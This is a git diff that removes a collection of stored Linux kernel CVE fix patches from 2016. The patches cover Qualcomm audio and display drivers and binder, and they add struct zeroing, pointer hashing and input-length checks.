-Subject: misc: qcom: qdsp6v2: Add missing initialization
-
-Use variables in driver context after proper initialization
-
-CRs-Fixed: 1049521, 1049615
-Change-Id: I3e59e27534b8e1088d74b42c72e0075d2fe910e6
-Signed-off-by: Haynes Mathew George
---
- drivers/misc/qcom/qdsp6v2/audio_utils.c | 3 ++-
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 1 +
- 2 files changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils.c b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-index cad0220..cec449d 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -588,6 +588,7 @@ long audio_in_compat_ioctl(struct file *file,
- }
- case AUDIO_GET_CONFIG_32: {
- struct msm_audio_config32 cfg_32;
-+ memset(&cfg_32, 0, sizeof(cfg_32));
- cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- cfg_32.channel_count = audio->pcm_cfg.channel_count;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index b87b208..b48aff3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1935,6 +1935,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- case AUDIO_GET_CONFIG_32: {
- struct msm_audio_config32 cfg_32;
- mutex_lock(&audio->lock);
-+ memset(&cfg_32, 0, sizeof(cfg_32));
- cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- cfg_32.channel_count = audio->pcm_cfg.channel_count;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6682/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6682/ANY/0001.patch
deleted file mode 100644
index 5ee20560..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6682/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 0950fbd39ff189497f1b6115825c210e3eeaf395 Mon Sep 17 00:00:00 2001
-From: Haynes Mathew George
-Date: Wed, 3 Aug 2016 11:55:07 -0700
-Subject: misc: qcom: qdsp6v2: Add missing initialization
-
-Use variables in driver context after proper initialization
-
-CRs-Fixed: 1049521, 1049615
-Change-Id: I3e59e27534b8e1088d74b42c72e0075d2fe910e6
-Signed-off-by: Haynes Mathew George
---
- drivers/misc/qcom/qdsp6v2/audio_utils.c | 3 ++-
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 1 +
- 2 files changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils.c b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-index cad0220..cec449d 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -588,6 +588,7 @@ long audio_in_compat_ioctl(struct file *file,
- }
- case AUDIO_GET_CONFIG_32: {
- struct msm_audio_config32 cfg_32;
-+ memset(&cfg_32, 0, sizeof(cfg_32));
- cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- cfg_32.channel_count = audio->pcm_cfg.channel_count;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index b87b208..b48aff3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1935,6 +1935,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- case AUDIO_GET_CONFIG_32: {
- struct msm_audio_config32 cfg_32;
- mutex_lock(&audio->lock);
-+ memset(&cfg_32, 0, sizeof(cfg_32));
- cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- cfg_32.channel_count = audio->pcm_cfg.channel_count;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch
deleted file mode 100644
index 44578d0f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/drivers/android/binder.c b/drivers/android/binder.c
-index 8837330..b2f704b 100644
---- a/drivers/android/binder.c
-+++ b/drivers/android/binder.c
-@@ -3454,7 +3454,7 @@
-
- static void print_binder_ref(struct seq_file *m, struct binder_ref *ref)
- {
-- seq_printf(m, " ref %d: desc %d %snode %d s %d w %d d %p\n",
-+ seq_printf(m, " ref %d: desc %d %snode %d s %d w %d d %pK\n",
- ref->debug_id, ref->desc, ref->node->proc ? "" : "dead ",
- ref->node->debug_id, ref->strong, ref->weak, ref->death);
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch.base64
deleted file mode 100644
index 918480c5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-6692/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6692/ANY/0001.patch
deleted file mode 100644
index c863936e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6692/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 0f0e7047d39f9fb3a1a7f389918ff79cdb4a50b3 Mon Sep 17 00:00:00 2001
-From: Ping Li
-Date: Tue, 19 Apr 2016 18:52:10 -0700
-Subject: msm: mdss: Properly set the PP feature cfg_payload in layers
-
-Set the PP feature cfg_payload properly to avoid invalid pointer
-cases.
-
-CRs-Fixed: 1004933
-Change-Id: I44314b49a6ebb5dedfdedfcddd88c12eabd1f125
-Signed-off-by: Ping Li
---
- drivers/video/msm/mdss/mdss_mdp_pp.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index 06ba5b1..0ed13ed0 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -7162,6 +7162,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- pr_err("Failed to copy IGC payload, ret = %d\n", ret);
- goto exit_pp_info;
- }
-+ } else {
-+ pp_info->igc_cfg.cfg_payload = NULL;
- }
- if (ops & MDP_OVERLAY_PP_HIST_LUT_CFG) {
- ret = pp_copy_layer_hist_lut_payload(pp_info);
-@@ -7170,6 +7172,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- ret);
- goto exit_igc;
- }
-+ } else {
-+ pp_info->hist_lut_cfg.cfg_payload = NULL;
- }
- if (ops & MDP_OVERLAY_PP_PA_V2_CFG) {
- ret = pp_copy_layer_pa_payload(pp_info);
-@@ -7177,6 +7181,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- pr_err("Failed to copy PA payload, ret = %d\n", ret);
- goto exit_hist_lut;
- }
-+ } else {
-+ pp_info->pa_v2_cfg_data.cfg_payload = NULL;
- }
- if (ops & MDP_OVERLAY_PP_PCC_CFG) {
- ret = pp_copy_layer_pcc_payload(pp_info);
-@@ -7184,6 +7190,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- pr_err("Failed to copy PCC payload, ret = %d\n", ret);
- goto exit_pa;
- }
-+ } else {
-+ pp_info->pcc_cfg_data.cfg_payload = NULL;
- }
-
- layer->pp_info = pp_info;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6693/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6693/ANY/0001.patch
deleted file mode 100644
index 865d8d71..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6693/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From ac328eb631fa74a63d5d2583e6bfeeb5a7a2df65 Mon Sep 17 00:00:00 2001
-From: Ashish Jain
-Date: Mon, 20 Jun 2016 18:09:07 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate data length
-
-Validate input data length to ensure only relevant data
-is copied.
-
-CRs-Fixed: 1027585
-Change-Id: I67eb4f162f944bbf4d9e55fb8fe93759e6b8ff91
-Signed-off-by: Ashish Jain
---
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index fea7bb4..379062e 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1522,6 +1522,14 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- goto end;
- }
-
-+ /* Return if invalid length */
-+ if (dolby_data->length >
-+ (DOLBY_MAX_LENGTH_INDIVIDUAL_PARAM - DOLBY_PARAM_PAYLOAD_SIZE)) {
-+ pr_err("Invalid length %d", dolby_data->length);
-+ rc = -EINVAL;
-+ goto end;
-+ }
-+
- for (i = 0; i < DS2_DEVICES_ALL; i++) {
- if ((dev_map[i].active) &&
- (dev_map[i].device_id & dolby_data->device_id)) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6694/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6694/ANY/0001.patch
deleted file mode 100644
index 8379f2a8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6694/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 961e38553aae8ba9b1af77c7a49acfbb7b0b6f62 Mon Sep 17 00:00:00 2001
-From: Ashish Jain
-Date: Thu, 30 Jun 2016 18:28:37 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Allocate param buffer with correct size
-
-Size of param buffer should be big enough to hold param length
-of data and param payload.
-
-CRs-Fixed: 1033525
-Change-Id: I6fa58f87a7c7df5f0485ea5b368ea090eb8bedb4
-Signed-off-by: Ashish Jain
---
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 9 +++++----
- 1 file changed, 5 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 379062e..7bd6ee8 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1554,7 +1554,8 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- pr_debug("%s: port_id 0x%x, copp_idx %d, dev_map[i].device_id %x\n",
- __func__, port_id, copp_idx, dev_map[i].device_id);
-
-- params_value = kzalloc(params_length, GFP_KERNEL);
-+ params_value = kzalloc(params_length + param_payload_len,
-+ GFP_KERNEL);
- if (!params_value) {
- pr_err("%s: params memory alloc failed\n", __func__);
- rc = -ENOMEM;
-@@ -1578,9 +1579,9 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- rc = -EINVAL;
- goto end;
- } else {
-- params_length = (ds2_dap_params_length[i] +
-- DOLBY_PARAM_PAYLOAD_SIZE) *
-- sizeof(uint32_t);
-+ params_length =
-+ ds2_dap_params_length[i] * sizeof(uint32_t);
-+
- rc = adm_get_params(port_id, copp_idx,
- DOLBY_BUNDLE_MODULE_ID,
- ds2_dap_params_id[i],
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6695/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6695/ANY/0001.patch
deleted file mode 100644
index 9b67d853..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6695/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From c319c2b0926d1ea5edb4d0778d88bd3ce37c4b95 Mon Sep 17 00:00:00 2001
-From: Ashish Jain
-Date: Fri, 1 Jul 2016 12:31:21 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-fetch visualizer data.
-
-CRs-Fixed: 1033540
-Change-Id: I445d1ba3bce47308bc31ae24a70d5ee358f22a2d
-Signed-off-by: Ashish Jain
---
- sound/soc/msm/qdsp6v2/msm-dolby-common.h | 3 ++-
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 7 +++++++
- 2 files changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-common.h b/sound/soc/msm/qdsp6v2/msm-dolby-common.h
-index aab6dc8..f14e42e 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-common.h
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-common.h
-@@ -1,5 +1,5 @@
-
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016 The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -232,6 +232,7 @@
-
- #define TOTAL_LENGTH_DOLBY_PARAM 745
- #define DOLBY_VIS_PARAM_HEADER_SIZE 25
-+#define DOLBY_PARAM_VCNB_MAX_LENGTH 40
-
- #define DOLBY_INVALID_PORT_ID -1
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 379062e..86290aa 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1635,6 +1635,13 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- }
-
- length = ds2_dap_params[cache_dev].params_val[DOLBY_PARAM_VCNB_OFFSET];
-+
-+ if (length > DOLBY_PARAM_VCNB_MAX_LENGTH || length <= 0) {
-+ ret = 0;
-+ dolby_data->length = 0;
-+ pr_err("%s Incorrect VCNB length", __func__);
-+ }
-+
- params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
- sizeof(uint32_t);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6696/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6696/ANY/0001.patch
deleted file mode 100644
index 87463916..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6696/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From c3c9341bfdf93606983f893a086cb33a487306e5 Mon Sep 17 00:00:00 2001
-From: Ashish Jain
-Date: Mon, 18 Jul 2016 16:07:42 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Update check to validate data length
-
-A big negative data length value can bypass the current check,
-update the condition to ensure that only valid data length is used
-to copy the params.
-
-CRs-Fixed: 1041130
-Change-Id: I6e1a58e901e4c042acfb0ab0a6223dec2949aefe
-Signed-off-by: Ashish Jain
---
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 48180cf..ad2f2e9 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1523,8 +1523,9 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- }
-
- /* Return if invalid length */
-- if (dolby_data->length >
-- (DOLBY_MAX_LENGTH_INDIVIDUAL_PARAM - DOLBY_PARAM_PAYLOAD_SIZE)) {
-+ if ((dolby_data->length >
-+ (DOLBY_MAX_LENGTH_INDIVIDUAL_PARAM - DOLBY_PARAM_PAYLOAD_SIZE)) ||
-+ (dolby_data->length <= 0)) {
- pr_err("Invalid length %d", dolby_data->length);
- rc = -EINVAL;
- goto end;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6698/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6698/3.10/0001.patch
deleted file mode 100644
index 8116c1e7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6698/3.10/0001.patch
+++ /dev/null
@@ -1,253 +0,0 @@
-From de90beb76ad0b80da821c3b857dd30cd36319e61 Mon Sep 17 00:00:00 2001
-From: Laxminath Kasam
-Date: Mon, 29 Aug 2016 21:58:32 +0530
-Subject: misc: qcom: qdsp6v2: initialize config_32
-
-Not all memebers of config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this issue
-initialize all member variables of struct config_32 to 0 before
-assigning specific values individually.
-
-CRs-Fixed: 1058826
-Change-Id: Ifea3a6e8bf45481c65a4455ee64318304798fee2
-Signed-off-by: Laxminath Kasam
---
- drivers/misc/qcom/qdsp6v2/aac_in.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/amrnb_in.c | 5 ++++-
- drivers/misc/qcom/qdsp6v2/amrwb_in.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_alac.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c | 6 +++++-
- drivers/misc/qcom/qdsp6v2/audio_ape.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_multi_aac.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 1 +
- drivers/misc/qcom/qdsp6v2/audio_wmapro.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/evrc_in.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/qcelp_in.c | 4 +++-
- 12 files changed, 35 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/aac_in.c b/drivers/misc/qcom/qdsp6v2/aac_in.c
-index c9d5dbb..7176c114 100644
---- a/drivers/misc/qcom/qdsp6v2/aac_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/aac_in.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -421,6 +421,8 @@ static long aac_in_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_aac_enc_config cfg;
- struct msm_audio_aac_enc_config32 cfg_32;
-
-+ memset(&cfg_32, 0, sizeof(cfg_32));
-+
- cmd = AUDIO_GET_AAC_ENC_CONFIG;
- rc = aac_in_ioctl_shared(file, cmd, &cfg);
- if (rc) {
-diff --git a/drivers/misc/qcom/qdsp6v2/amrnb_in.c b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-index eb92137..1bb441b 100644
---- a/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-@@ -1,4 +1,5 @@
--/* Copyright (c) 2010-2012, 2014 The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2012, 2014, 2016 The Linux Foundation.
-+ * All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -221,6 +222,8 @@ static long amrnb_in_compat_ioctl(struct file *file,
- struct msm_audio_amrnb_enc_config_v2 *amrnb_config;
- struct msm_audio_amrnb_enc_config_v2_32 amrnb_config_32;
-
-+ memset(&amrnb_config_32, 0, sizeof(amrnb_config_32));
-+
- amrnb_config =
- (struct msm_audio_amrnb_enc_config_v2 *)audio->enc_cfg;
- amrnb_config_32.band_mode = amrnb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/amrwb_in.c b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-index 9bd19d9..43dcbd5 100644
---- a/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-@@ -217,6 +217,8 @@ static long amrwb_in_compat_ioctl(struct file *file,
- struct msm_audio_amrwb_enc_config *amrwb_config;
- struct msm_audio_amrwb_enc_config_32 amrwb_config_32;
-
-+ memset(&amrwb_config_32, 0, sizeof(amrwb_config_32));
-+
- amrwb_config =
- (struct msm_audio_amrwb_enc_config *)audio->enc_cfg;
- amrwb_config_32.band_mode = amrwb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_alac.c b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-index eaae366..27d542c 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_alac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -202,6 +202,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_alac_config *alac_config;
- struct msm_audio_alac_config_32 alac_config_32;
-
-+ memset(&alac_config_32, 0, sizeof(alac_config_32));
-+
- alac_config = (struct msm_audio_alac_config *)audio->codec_cfg;
- alac_config_32.frameLength = alac_config->frameLength;
- alac_config_32.compatVersion =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-index ec4d8f5..727a536 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-@@ -2,7 +2,7 @@
- *
- * Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -205,6 +205,10 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_amrwbplus_config_v2 *amrwbplus_config;
- struct msm_audio_amrwbplus_config_v2_32
- amrwbplus_config_32;
-+
-+ memset(&amrwbplus_config_32, 0,
-+ sizeof(amrwbplus_config_32));
-+
- amrwbplus_config =
- (struct msm_audio_amrwbplus_config_v2 *)
- audio->codec_cfg;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_ape.c b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-index 3ba7050..d7d550c 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_ape.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -180,6 +180,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_ape_config *ape_config;
- struct msm_audio_ape_config_32 ape_config_32;
-
-+ memset(&ape_config_32, 0, sizeof(ape_config_32));
-+
- ape_config = (struct msm_audio_ape_config *)audio->codec_cfg;
- ape_config_32.compatibleVersion = ape_config->compatibleVersion;
- ape_config_32.compressionLevel =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 6843fd7..940fd08 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -630,6 +630,8 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- case AUDIO_EFFECTS_GET_BUF_AVAIL32: {
- struct msm_hwacc_buf_avail32 buf_avail;
-
-+ memset(&buf_avail, 0, sizeof(buf_avail));
-+
- buf_avail.input_num_avail = atomic_read(&effects->in_count);
- buf_avail.output_num_avail = atomic_read(&effects->out_count);
- pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-index 52e9bdd..bad1cbb 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-@@ -2,7 +2,7 @@
- *
- * Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -304,6 +304,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_aac_config *aac_config;
- struct msm_audio_aac_config32 aac_config_32;
-
-+ memset(&aac_config_32, 0, sizeof(aac_config_32));
-+
- aac_config = (struct msm_audio_aac_config *)audio->codec_cfg;
- aac_config_32.format = aac_config->format;
- aac_config_32.audio_object = aac_config->audio_object;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 3e096fd..5196028 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -2071,6 +2071,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- audio->buf_cfg.frames_per_buf);
-
- mutex_lock(&audio->lock);
-+ memset(&cfg_32, 0, sizeof(cfg_32));
- cfg_32.meta_info_enable = audio->buf_cfg.meta_info_enable;
- cfg_32.frames_per_buf = audio->buf_cfg.frames_per_buf;
- if (copy_to_user((void *)arg, &cfg_32,
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-index c323cb4..d37a578 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-@@ -2,7 +2,7 @@
- *
- * Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -217,6 +217,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_wmapro_config *wmapro_config;
- struct msm_audio_wmapro_config32 wmapro_config_32;
-
-+ memset(&wmapro_config_32, 0, sizeof(wmapro_config_32));
-+
- wmapro_config =
- (struct msm_audio_wmapro_config *)audio->codec_cfg;
- wmapro_config_32.armdatareqthr = wmapro_config->armdatareqthr;
-diff --git a/drivers/misc/qcom/qdsp6v2/evrc_in.c b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-index 2f931be..aab8e27 100644
---- a/drivers/misc/qcom/qdsp6v2/evrc_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
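- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -224,6 +224,8 @@ static long evrc_in_compat_ioctl(struct file *file,
- struct msm_audio_evrc_enc_config32 cfg_32;
- struct msm_audio_evrc_enc_config *enc_cfg;
-
-+ memset(&cfg_32, 0, sizeof(cfg_32));
-+
- enc_cfg = audio->enc_cfg;
- cfg_32.cdma_rate = enc_cfg->cdma_rate;
- cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
-diff --git a/drivers/misc/qcom/qdsp6v2/qcelp_in.c b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-index b5d5ad1..aabf5d3 100644
---- a/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -225,6 +225,8 @@ static long qcelp_in_compat_ioctl(struct file *file,
- struct msm_audio_qcelp_enc_config32 cfg_32;
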